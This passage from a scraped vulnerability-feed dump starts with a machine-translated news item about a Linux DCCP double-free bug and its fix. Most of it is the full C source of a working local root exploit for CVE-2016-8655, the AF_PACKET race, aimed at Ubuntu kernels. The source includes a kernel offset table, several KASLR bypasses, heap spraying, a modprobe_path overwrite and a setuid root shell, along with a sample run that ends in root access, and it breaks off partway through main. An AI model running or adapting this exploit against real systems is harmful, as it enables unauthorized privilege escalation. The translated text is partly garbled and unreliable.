\nThe DCCP double-free vulnerability allows a local low-privileged user to modify Linux kernel memory, causing a denial of service (system crash) or privilege escalation to administrative access. \nVulnerability details\nThis is a use-after-free (UAF) vulnerability: when the IPV6_RECVPKTINFO option is enabled, the kernel's DCCP protocol handling frees the SKB used during parsing once it determines that a DCCP_PKT_REQUEST packet has been received. \u201cThe DCCP protocol implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket.\u201d \nIn the current implementation, if dccp_v6_conn_request returns a value during DCCP parsing, dccp_rcv_state_process frees the SKB of the received DCCP_PKT_REQUEST packet via __kfree_skb. However, if the kernel is compiled with IPV6_RECVPKTINFO enabled, the skb address is also stored in ireq->pktopts and dccp_v6_conn_request increments its reference count, so the skb remains in use until dccp_rcv_state_process releases it. \nUsing a kernel heap spray technique, an attacker can gain control of an arbitrary object and overwrite its contents with arbitrary data. If the overwritten object contains a function pointer that can be triggered, the attacker can execute arbitrary code in the kernel. \nThis is not a remote code execution vulnerability; an attacker must have a local account on the system to exploit it. \nTwo months ago, the Linux kernel was also found to have a similar privilege escalation vulnerability, CVE-2016-8655, which dates back to 2011: a low-privileged local user could exploit a race condition in the Linux kernel's af_packet implementation to gain root access.\n\nSolution\nManual fix: call consume_skb instead of jumping to discard and calling __kfree_skb\u3002 \n! 
[](/Article/UploadPic/2017-2/201722319322422. png? www. myhack58. com) \n\nA more detailed solution please click here. If you are an advanced Linux user, then you can apply the patch, rebuild the kernel, or wait for the Publisher to publish the update. \n\n", "modified": "2017-02-23T00:00:00", "published": "2017-02-23T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/83692.htm", "id": "MYHACK58:62201783692", "type": "myhack58", "title": "Lurking in 11 years of Linux kernel to mention the right vulnerability-exposure-vulnerability warning-the black bar safety net", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.0-21 4.4.0-51 (Ubuntu 14.0416.04 x86-64) - AF_PACKET Race Condition Privilege Escalation", "edition": 1, "published": "2018-12-29T00:00:00", "title": "Linux Kernel 4.4.0-21 4.4.0-51 (Ubuntu 14.0416.04 x86-64) - AF_PACKET Race Condition Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2018-12-29T00:00:00", "id": "EXPLOITPACK:D5BBB161063632A8D15C357D43E97C75", "href": "", "sourceData": "/*\nchocobo_root.c\nlinux AF_PACKET race condition exploit for CVE-2016-8655.\nIncludes KASLR and SMEP/SMAP bypasses.\nFor Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.\nAll kernel offsets have been tested on Ubuntu / Linux Mint.\n\nvroom vroom\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\nuser@ubuntu:~$ uname -a\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\nuser@ubuntu:~$ id\nuid=1000(user) gid=1000(user) groups=1000(user)\nuser@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread\nuser@ubuntu:~$ ./chocobo_root\nlinux AF_PACKET race condition exploit by rebel\nkernel version: 4.4.0-51-generic #72\nproc_dostring = 0xffffffff81088090\nmodprobe_path = 
0xffffffff81e48f80\nregister_sysctl_table = 0xffffffff812879a0\nset_memory_rw = 0xffffffff8106f320\nexploit starting\nmaking vsyscall page writable..\n\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\nsockets allocated\nremoving barrier and spraying..\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\ncurrent packet version = 0\npbd->hdr.bh1.offset_to_first_pkt = 48\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\nclosing socket and verifying.......\nvsyscall page altered!\n\n\nstage 1 completed\nregistering new sysctl..\n\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\nsockets allocated\nremoving barrier and spraying..\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\ncurrent packet version = 2\npbd->hdr.bh1.offset_to_first_pkt = 48\nrace not won\n\nretrying stage..\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\nsockets allocated\nremoving barrier and spraying..\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\ncurrent packet version = 0\npbd->hdr.bh1.offset_to_first_pkt = 48\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. 
so don't do that.\nclosing socket and verifying.......\nsysctl added!\n\nstage 2 completed\nbinary executed by kernel, launching rootshell\nroot@ubuntu:~# id\nuid=0(root) gid=0(root) groups=0(root),1000(user)\n\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\n\nShoutouts to:\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\nmcdelivery for delivering hotcakes and coffee\n\n11/2016\nby rebel\n---\nUpdated by <bcoles@gmail.com>\n- check number of CPU cores\n- KASLR bypasses\n- additional kernel targets\nhttps://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655\n*/\n\n#define _GNU_SOURCE\n\n#include <fcntl.h>\n#include <poll.h>\n#include <pthread.h>\n#include <sched.h>\n#include <signal.h>\n#include <stdbool.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\n#include <sys/klog.h>\n#include <sys/mman.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <sys/stat.h>\n#include <sys/syscall.h>\n#include <sys/sysinfo.h>\n#include <sys/utsname.h>\n#include <sys/wait.h>\n\n#include <arpa/inet.h>\n#include <linux/if_packet.h>\n#include <linux/sched.h>\n#include <netinet/tcp.h>\n#include <netinet/if_ether.h>\n\n#define DEBUG\n\n#ifdef DEBUG\n# define dprintf printf\n#else\n# define dprintf\n#endif\n\n#define ENABLE_KASLR_BYPASS 1\n\n// Will be overwritten if ENABLE_KASLR_BYPASS\nunsigned long KERNEL_BASE = 0xffffffff81000000ul;\n\n// Will be overwritten by detect_versions()\nint kernel = -1;\n\n// New sysctl path\nconst char *SYSCTL_NAME = \"hack\";\nconst char *SYSCTL_PATH = \"/proc/sys/hack\";\n\nvolatile int barrier = 1;\nvolatile int vers_switcher_done = 0;\n\nstruct kernel_info {\n char *kernel_version;\n unsigned long proc_dostring;\n unsigned long modprobe_path;\n unsigned long register_sysctl_table;\n unsigned long set_memory_rw;\n};\n\nstruct kernel_info kernels[] = {\n { \"4.4.0-21-generic #37~14.04.1-Ubuntu\", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },\n { 
\"4.4.0-22-generic #40~14.04.1-Ubuntu\", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },\n { \"4.4.0-24-generic #43~14.04.1-Ubuntu\", 0x084120, 0xc4b080, 0x2736f0, 0x06b880 },\n { \"4.4.0-28-generic #47~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273b70, 0x06b880 },\n { \"4.4.0-31-generic #50~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c20, 0x06b880 },\n { \"4.4.0-34-generic #53~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c40, 0x06b880 },\n { \"4.4.0-36-generic #55~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c60, 0x06b890 },\n { \"4.4.0-38-generic #57~14.04.1-Ubuntu\", 0x084210, 0xe4b100, 0x2742e0, 0x06b890 },\n { \"4.4.0-42-generic #62~14.04.1-Ubuntu\", 0x084260, 0xe4b100, 0x274300, 0x06b880 },\n { \"4.4.0-45-generic #66~14.04.1-Ubuntu\", 0x084260, 0xe4b100, 0x274340, 0x06b880 },\n //{\"4.4.0-46-generic #67~14.04.1-Ubuntu\",0x0842f0,0xe4b100,0x274580,0x06b880},\n { \"4.4.0-47-generic #68~14.04.1-Ubuntu\", 0x0842f0, 0xe4b100, 0x274580, 0x06b880 },\n //{\"4.4.0-49-generic #70~14.04.1-Ubuntu\",0x084350,0xe4b100,0x274b10,0x06b880},\n { \"4.4.0-51-generic #72~14.04.1-Ubuntu\", 0x084350, 0xe4b100, 0x274750, 0x06b880 },\n\n { \"4.4.0-21-generic #37-Ubuntu\", 0x087cf0, 0xe48e80, 0x286310, 0x06f370 },\n { \"4.4.0-22-generic #40-Ubuntu\", 0x087d40, 0xe48f00, 0x2864d0, 0x06f370 },\n { \"4.4.0-24-generic #43-Ubuntu\", 0x087e60, 0xe48f00, 0x2868f0, 0x06f370 },\n { \"4.4.0-28-generic #47-Ubuntu\", 0x087ea0, 0xe48f80, 0x286df0, 0x06f370 },\n { \"4.4.0-31-generic #50-Ubuntu\", 0x087ea0, 0xe48f80, 0x286e90, 0x06f370 },\n { \"4.4.0-34-generic #53-Ubuntu\", 0x087ea0, 0xe48f80, 0x286ed0, 0x06f370 },\n { \"4.4.0-36-generic #55-Ubuntu\", 0x087ea0, 0xe48f80, 0x286e50, 0x06f360 },\n { \"4.4.0-38-generic #57-Ubuntu\", 0x087f70, 0xe48f80, 0x287470, 0x06f360 },\n { \"4.4.0-42-generic #62-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874a0, 0x06f320 },\n { \"4.4.0-43-generic #63-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874b0, 0x06f320 },\n { \"4.4.0-45-generic #66-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874c0, 0x06f320 },\n 
//{\"4.4.0-46-generic #67-Ubuntu\",0x088040,0xe48f80,0x287800,0x06f320},\n { \"4.4.0-47-generic #68-Ubuntu\", 0x088040, 0xe48f80, 0x287800, 0x06f320 },\n //{\"4.4.0-49-generic #70-Ubuntu\",0x088090,0xe48f80,0x287d40,0x06f320},\n { \"4.4.0-51-generic #72-Ubuntu\", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},\n};\n\n#define VSYSCALL 0xffffffffff600000\n#define PROC_DOSTRING (KERNEL_BASE + kernels[kernel].proc_dostring)\n#define MODPROBE_PATH (KERNEL_BASE + kernels[kernel].modprobe_path)\n#define REGISTER_SYSCTL_TABLE (KERNEL_BASE + kernels[kernel].register_sysctl_table)\n#define SET_MEMORY_RW (KERNEL_BASE + kernels[kernel].set_memory_rw)\n\n#define KMALLOC_PAD 64\n\nint pad_fds[KMALLOC_PAD];\n\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\n\nstruct ctl_table {\n const char *procname;\n void *data;\n int maxlen;\n unsigned short mode;\n struct ctl_table *child;\n void *proc_handler;\n void *poll;\n void *extra1;\n void *extra2;\n};\n\n#define CONF_RING_FRAMES 1\n\nstruct tpacket_req3 tp;\nint sfd;\nint mapped = 0;\n\nstruct timer_list {\n void *next;\n void *prev;\n unsigned long expires;\n void (*function)(unsigned long);\n unsigned long data;\n unsigned int flags;\n int slack;\n};\n\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\n\nvoid *setsockopt_thread(void *arg)\n{\n while (barrier) {}\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));\n\n return NULL;\n}\n\nvoid *vers_switcher(void *arg)\n{\n int val,x,y;\n\n while (barrier) {}\n\n while (1) {\n val = TPACKET_V1;\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\n\n y++;\n\n if (x != 0) break;\n\n val = TPACKET_V3;\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\n\n if (x != 0) break;\n\n y++;\n }\n\n dprintf(\"[.] 
version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\n vers_switcher_done = 1;\n\n return NULL;\n}\n\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\n\n#define BUFSIZE 1408\nchar exploitbuf[BUFSIZE];\n\nvoid kmalloc(void)\n{\n while(1)\n syscall(__NR_add_key, \"user\", \"wtf\", exploitbuf, BUFSIZE - 24, -2);\n}\n\nvoid pad_kmalloc(void)\n{\n int x;\n for (x = 0; x < KMALLOC_PAD; x++)\n if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {\n dprintf(\"[-] pad_kmalloc() socket error\\n\");\n exit(EXIT_FAILURE);\n }\n}\n\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\n\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\n{\n pthread_t setsockopt_thread_thread,a;\n int val;\n socklen_t l;\n struct timer_list *timer;\n int fd;\n struct tpacket_block_desc *pbd;\n int off;\n sigset_t set;\n\n sigemptyset(&set);\n\n sigaddset(&set, SIGSEGV);\n\n if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\n dprintf(\"[-] couldn't set sigmask\\n\");\n exit(1);\n }\n\n dprintf(\"[.] new exploit attempt starting, jumping to %p, arg=%p\\n\", (void *)func, (void *)arg);\n\n pad_kmalloc();\n\n fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\n\n if (fd == -1) {\n dprintf(\"[-] target socket error\\n\");\n exit(1);\n }\n\n pad_kmalloc();\n\n dprintf(\"[.] 
done, sockets allocated\\n\");\n\n val = TPACKET_V3;\n\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\n\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\n tp.tp_block_nr = 1;\n tp.tp_frame_size = getpagesize();\n tp.tp_frame_nr = CONF_RING_FRAMES;\n\n // try to set the timeout to 10 seconds\n // the default timeout might still be used though depending on when the race was won\n tp.tp_retire_blk_tov = 10000;\n\n sfd = fd;\n\n if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\n dprintf(\"[-] Error creating thread\\n\");\n return 1;\n }\n\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\n\n usleep(200000);\n\n dprintf(\"[.] removing barrier and spraying...\\n\");\n\n memset(exploitbuf, '\\x00', BUFSIZE);\n\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\n timer->next = 0;\n timer->prev = 0;\n\n timer->expires = 4294943360;\n timer->function = (void *)func;\n timer->data = arg;\n timer->flags = 1;\n timer->slack = -1;\n\n barrier = 0;\n\n usleep(100000);\n\n while (!vers_switcher_done) usleep(100000);\n\n l = sizeof(val);\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\n\n dprintf(\"[.] current packet version = %d\\n\",val);\n\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\n\n if (pbd == MAP_FAILED) {\n dprintf(\"[-] could not map pbd\\n\");\n exit(1);\n } else {\n off = pbd->hdr.bh1.offset_to_first_pkt;\n dprintf(\"[.] pbd->hdr.bh1.offset_to_first_pkt = %d\\n\", off);\n }\n\n\n if (val == TPACKET_V1 && off != 0) {\n dprintf(\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\n } else {\n dprintf(\"[-] race not won\\n\");\n exit(2);\n }\n\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\n\n pthread_create(&a, NULL, verification_func, (void *)NULL);\n\n dprintf(\"\\n\");\n dprintf(\"[!] please wait up to a few minutes for timer to be executed.\\n\");\n dprintf(\"[!] if you ctrl-c now the kernel will hang. 
so don't do that.\\n\");\n dprintf(\"\\n\");\n\n sleep(1);\n dprintf(\"[.] closing socket and verifying...\\n\");\n\n close(sfd);\n\n kmalloc();\n\n dprintf(\"[.] all messages sent\\n\");\n\n sleep(31337);\n exit(1);\n}\n\nint verification_result = 0;\n\nvoid catch_sigsegv(int sig)\n{\n verification_result = 0;\n pthread_exit((void *)1);\n}\n\nvoid *modify_vsyscall(void *arg)\n{\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\n unsigned long x = (unsigned long)arg;\n\n sigset_t set;\n sigemptyset(&set);\n sigaddset(&set, SIGSEGV);\n\n if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\n dprintf(\"[-] couldn't set sigmask\\n\");\n exit(EXIT_FAILURE);\n }\n\n signal(SIGSEGV, catch_sigsegv);\n\n *vsyscall = 0xdeadbeef+x;\n\n if (*vsyscall == 0xdeadbeef+x) {\n dprintf(\"[~] vsyscall page altered!\\n\");\n verification_result = 1;\n pthread_exit(0);\n }\n\n return NULL;\n}\n\nvoid verify_stage1(void)\n{\n pthread_t v_thread;\n\n sleep(5);\n\n int x;\n for(x = 0; x < 300; x++) {\n\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\n\n pthread_join(v_thread, NULL);\n\n if(verification_result == 1) {\n exit(0);\n }\n\n write(2,\".\",1);\n sleep(1);\n }\n\n dprintf(\"[-] could not modify vsyscall\\n\");\n exit(EXIT_FAILURE);\n}\n\nvoid verify_stage2(void)\n{\n struct stat b;\n\n sleep(5);\n\n int x;\n for(x = 0; x < 300; x++) {\n\n if (stat(SYSCTL_PATH, &b) == 0) {\n dprintf(\"[~] sysctl added!\\n\");\n exit(0);\n }\n\n write(2,\".\",1);\n sleep(1);\n }\n\n dprintf(\"[-] could not add sysctl\\n\");\n exit(EXIT_FAILURE);\n}\n\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\n{\n int status;\n int pid;\n\nretry:\n\n pid = fork();\n\n if (pid == 0) {\n try_exploit(func, arg, verification_func);\n exit(1);\n }\n\n wait(&status);\n\n dprintf(\"\\n\");\n\n if (WEXITSTATUS(status) == 2) {\n dprintf(\"[.] 
retrying stage...\\n\");\n kill(pid, 9);\n sleep(2);\n goto retry;\n }\n\n if (WEXITSTATUS(status) != 0) {\n dprintf(\"[-] something bad happened, aborting exploit attempt\\n\");\n exit(EXIT_FAILURE);\n }\n\n kill(pid, 9);\n}\n\n\nvoid wrapper(void)\n{\n struct ctl_table *c;\n\n dprintf(\"[.] making vsyscall page writable...\\n\\n\");\n\n exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);\n\n dprintf(\"[~] done, stage 1 completed\\n\");\n\n sleep(5);\n\n dprintf(\"[.] registering new sysctl...\\n\\n\");\n\n c = (struct ctl_table *)(VSYSCALL+0x850);\n\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\n\n strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);\n memcpy((char *)(VSYSCALL+0xe00), \"\\x01\\x00\\x00\\x00\",4);\n c->procname = (char *)(VSYSCALL+0xf00);\n c->mode = 0666;\n c->proc_handler = (void *)(PROC_DOSTRING);\n c->data = (void *)(MODPROBE_PATH);\n c->maxlen = 256;\n c->extra1 = (void *)(VSYSCALL+0xe00);\n c->extra2 = (void *)(VSYSCALL+0xd00);\n\n exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);\n\n dprintf(\"[~] done, stage 2 completed\\n\");\n}\n\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\n\nvoid check_procs() {\n int min_procs = 2;\n\n int nprocs = 0;\n nprocs = get_nprocs_conf();\n\n if (nprocs < min_procs) {\n dprintf(\"[-] system has less than %d processor cores\\n\", min_procs);\n exit(EXIT_FAILURE);\n }\n\n dprintf(\"[.] 
system has %d processor cores\\n\", nprocs);\n}\n\nstruct utsname get_kernel_version() {\n struct utsname u;\n int rv = uname(&u);\n if (rv != 0) {\n dprintf(\"[-] uname())\\n\");\n exit(EXIT_FAILURE);\n }\n return u;\n}\n\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\n\nvoid detect_versions() {\n struct utsname u;\n char kernel_version[512];\n\n u = get_kernel_version();\n\n if (strstr(u.machine, \"64\") == NULL) {\n dprintf(\"[-] system is not using a 64-bit kernel\\n\");\n exit(EXIT_FAILURE);\n }\n\n if (strstr(u.version, \"-Ubuntu\") == NULL) {\n dprintf(\"[-] system is not using an Ubuntu kernel\\n\");\n exit(EXIT_FAILURE);\n }\n\n char *u_ver = strtok(u.version, \" \");\n snprintf(kernel_version, 512, \"%s %s\", u.release, u_ver);\n\n int i;\n for (i = 0; i < ARRAY_SIZE(kernels); i++) {\n if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {\n dprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].kernel_version);\n kernel = i;\n return;\n }\n }\n\n dprintf(\"[-] kernel version not recognized\\n\");\n exit(EXIT_FAILURE);\n}\n\n// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *\n\n#define SYSLOG_ACTION_READ_ALL 3\n#define SYSLOG_ACTION_SIZE_BUFFER 10\n\nbool mmap_syslog(char** buffer, int* size) {\n *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\n if (*size == -1) {\n dprintf(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\\n\");\n return false;\n }\n\n *size = (*size / getpagesize() + 1) * getpagesize();\n *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n\n *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);\n if (*size == -1) {\n dprintf(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\\n\");\n return false;\n }\n\n return true;\n}\n\nunsigned long get_kernel_addr_trusty(char* buffer, int size) {\n const char* needle1 = \"Freeing unused\";\n char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\n if (substr == NULL) return 0;\n\n int start = 
0;\n int end = 0;\n for (end = start; substr[end] != '-'; end++);\n\n const char* needle2 = \"ffffff\";\n substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\n if (substr == NULL) return 0;\n\n char* endptr = &substr[16];\n unsigned long r = strtoul(&substr[0], &endptr, 16);\n\n r &= 0xffffffffff000000ul;\n\n return r;\n}\n\nunsigned long get_kernel_addr_xenial(char* buffer, int size) {\n const char* needle1 = \"Freeing unused\";\n char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\n if (substr == NULL) {\n return 0;\n }\n\n int start = 0;\n int end = 0;\n for (start = 0; substr[start] != '-'; start++);\n for (end = start; substr[end] != '\\n'; end++);\n\n const char* needle2 = \"ffffff\";\n substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\n if (substr == NULL) {\n return 0;\n }\n\n char* endptr = &substr[16];\n unsigned long r = strtoul(&substr[0], &endptr, 16);\n\n r &= 0xfffffffffff00000ul;\n r -= 0x1000000ul;\n\n return r;\n}\n\nunsigned long get_kernel_addr_syslog() {\n unsigned long addr = 0;\n char* syslog;\n int size;\n\n dprintf(\"[.] trying syslog...\\n\");\n\n if (!mmap_syslog(&syslog, &size))\n return 0;\n\n if (strstr(kernels[kernel].kernel_version, \"14.04.1\") != NULL)\n addr = get_kernel_addr_trusty(syslog, size);\n else\n addr = get_kernel_addr_xenial(syslog, size);\n\n if (!addr)\n dprintf(\"[-] kernel base not found in syslog\\n\");\n\n return addr;\n}\n\n// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr_kallsyms() {\n FILE *f;\n unsigned long addr = 0;\n char dummy;\n char sname[256];\n char* name = \"startup_64\";\n char* path = \"/proc/kallsyms\";\n\n dprintf(\"[.] 
trying %s...\\n\", path);\n f = fopen(path, \"r\");\n if (f == NULL) {\n dprintf(\"[-] open/read(%s)\\n\", path);\n return 0;\n }\n\n int ret = 0;\n while (ret != EOF) {\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n if (ret == 0) {\n fscanf(f, \"%s\\n\", sname);\n continue;\n }\n if (!strcmp(name, sname)) {\n fclose(f);\n return addr;\n }\n }\n\n fclose(f);\n dprintf(\"[-] kernel base not found in %s\\n\", path);\n return 0;\n}\n\n// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr_sysmap() {\n FILE *f;\n unsigned long addr = 0;\n char path[512] = \"/boot/System.map-\";\n char version[32];\n\n struct utsname u;\n u = get_kernel_version();\n strcat(path, u.release);\n dprintf(\"[.] trying %s...\\n\", path);\n f = fopen(path, \"r\");\n if (f == NULL) {\n dprintf(\"[-] open/read(%s)\\n\", path);\n return 0;\n }\n\n char dummy;\n char sname[256];\n char* name = \"startup_64\";\n int ret = 0;\n while (ret != EOF) {\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n if (ret == 0) {\n fscanf(f, \"%s\\n\", sname);\n continue;\n }\n if (!strcmp(name, sname)) {\n fclose(f);\n return addr;\n }\n }\n\n fclose(f);\n dprintf(\"[-] kernel base not found in %s\\n\", path);\n return 0;\n}\n\n// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr_mincore() {\n unsigned char buf[getpagesize()/sizeof(unsigned char)];\n unsigned long iterations = 20000000;\n unsigned long addr = 0;\n\n dprintf(\"[.] 
trying mincore info leak...\\n\");\n /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */\n if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,\n MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {\n dprintf(\"[-] mmap()\\n\");\n return 0;\n }\n\n int i;\n for (i = 0; i <= iterations; i++) {\n /* Touch a mishandle with this type mapping */\n if (mincore((void*)0x86000000, 0x1000000, buf)) {\n dprintf(\"[-] mincore()\\n\");\n return 0;\n }\n\n int n;\n for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {\n addr = *(unsigned long*)(&buf[n]);\n /* Kernel address space */\n if (addr > 0xffffffff00000000) {\n addr &= 0xffffffffff000000ul;\n if (munmap((void*)0x66000000, 0x20000000000))\n dprintf(\"[-] munmap()\\n\");\n return addr;\n }\n }\n }\n\n if (munmap((void*)0x66000000, 0x20000000000))\n dprintf(\"[-] munmap()\\n\");\n\n dprintf(\"[-] kernel base not found in mincore info leak\\n\");\n return 0;\n}\n\n// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr() {\n unsigned long addr = 0;\n\n addr = get_kernel_addr_kallsyms();\n if (addr) return addr;\n\n addr = get_kernel_addr_sysmap();\n if (addr) return addr;\n\n addr = get_kernel_addr_syslog();\n if (addr) return addr;\n\n addr = get_kernel_addr_mincore();\n if (addr) return addr;\n\n dprintf(\"[-] KASLR bypass failed\\n\");\n exit(EXIT_FAILURE);\n\n return 0;\n}\n\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\n\nvoid launch_rootshell(void)\n{\n int fd;\n char buf[256];\n struct stat s;\n\n fd = open(SYSCTL_PATH, O_WRONLY);\n\n if(fd == -1) {\n dprintf(\"[-] could not open %s\\n\", SYSCTL_PATH);\n exit(EXIT_FAILURE);\n }\n\n memset(buf, '\\x00', 256);\n\n readlink(\"/proc/self/exe\", (char *)&buf, 256);\n\n write(fd, buf, strlen(buf)+1);\n\n socket(AF_INET, SOCK_STREAM, 132);\n\n if (stat(buf,&s) == 0 && s.st_uid == 0) {\n dprintf(\"[+] binary executed by kernel, launching rootshell\\n\");\n 
lseek(fd, 0, SEEK_SET);\n write(fd, \"/sbin/modprobe\", 15);\n close(fd);\n execl(buf, buf, NULL);\n } else {\n dprintf(\"[-] could not create rootshell\\n\");\n exit(EXIT_FAILURE);\n }\n}\n\nvoid setup_sandbox() {\n if (unshare(CLONE_NEWUSER) != 0) {\n dprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\n exit(EXIT_FAILURE);\n }\n\n if (unshare(CLONE_NEWNET) != 0) {\n dprintf(\"[-] unshare(CLONE_NEWNET)\\n\");\n exit(EXIT_FAILURE);\n }\n}\n\nint main(int argc, char **argv)\n{\n int status, pid;\n struct utsname u;\n char buf[512], *f;\n\n if (getuid() == 0 && geteuid() == 0) {\n chown(\"/proc/self/exe\", 0, 0);\n chmod(\"/proc/self/exe\", 06755);\n exit(0);\n }\n\n if (getuid() != 0 && geteuid() == 0) {\n setresuid(0, 0, 0);\n setresgid(0, 0, 0);\n execl(\"/bin/bash\", \"bash\", \"-p\", NULL);\n exit(0);\n }\n\n dprintf(\"linux AF_PACKET race condition exploit by rebel\\n\");\n\n dprintf(\"[.] starting\\n\");\n\n dprintf(\"[.] checking hardware\\n\");\n check_procs();\n dprintf(\"[~] done, hardware looks good\\n\");\n\n dprintf(\"[.] checking kernel version\\n\");\n detect_versions();\n dprintf(\"[~] done, version looks good\\n\");\n\n#if ENABLE_KASLR_BYPASS\n dprintf(\"[.] KASLR bypass enabled, getting kernel base address\\n\");\n KERNEL_BASE = get_kernel_addr();\n dprintf(\"[~] done, kernel text: %lx\\n\", KERNEL_BASE);\n#endif\n\n dprintf(\"[.] proc_dostring: %lx\\n\", PROC_DOSTRING);\n dprintf(\"[.] modprobe_path: %lx\\n\", MODPROBE_PATH);\n dprintf(\"[.] register_sysctl_table: %lx\\n\", REGISTER_SYSCTL_TABLE);\n dprintf(\"[.] set_memory_rw: %lx\\n\", SET_MEMORY_RW);\n\n pid = fork();\n if (pid == 0) {\n dprintf(\"[.] 
